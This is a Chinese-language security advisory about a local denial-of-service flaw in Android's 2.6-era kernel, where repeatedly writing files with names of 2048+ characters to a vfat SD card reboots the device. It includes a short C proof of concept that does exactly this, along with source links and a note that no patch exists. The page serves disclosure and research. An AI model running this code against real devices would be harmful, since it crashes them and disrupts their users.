发布日期:2012-12-11
更新日期:2012-12-17受影响系统:
Google Android 2.6
描述:
--------------------------------------------------------------------------------
Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。Android OS 2.6版本多次尝试执行将一个文件名长度大于或等于2048的文件写入到SD卡(vfat文件系统)时会引起Android操作系统产生一个本地DoS,成功运行利用代码可以导致系统重启。<*来源:G13 (@g13net)
链接:http://www.exploit-db.com/exploits/23248/
http://osvdb.org/show/osvdb/88310
http://seclists.org/bugtraq/2012/Dec/69
http://packetstormsecurity.org/files/118708/Android-Kernel-2.6-Denial-Of-Service.html
http://www.freebuf.com/vuls/6456.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#include <stdio.h>int main(int argc, char** argv) {
char buf[5000];
int j,k;
FILE *fp;
/* Path to sdcard, typically /sdcard/ */
strcpy(buf,"/sdcard/");
for(k=0;k<=2048;k++){
strcat(buf,"A");
};
for(j=0;j<=50;j++){
fp=fopen(buf,"w");
};
return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.android.com/VMware View Connection Server和View Security Server tunnel-server组件目录穿越漏洞Joomla! JooProperty 组件SQL注入和跨站脚本漏洞相关资讯 本地拒绝服务漏洞 Android安全漏洞
- Android 的四月安全更新修复了另一 (04月05日)
- Android WebView组件addJavascript (09/07/2013 06:16:23)
- Android绕过数字签名可修改代码漏 (07/05/2013 16:24:37)
| - Android 再现安全漏洞,骇客利用冗 (09/17/2015 20:57:02)
- Google Android PRNG熵漏洞 (08/19/2013 20:46:21)
- Android 安全模式惊曝新漏洞 (07/05/2013 15:26:09)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并
|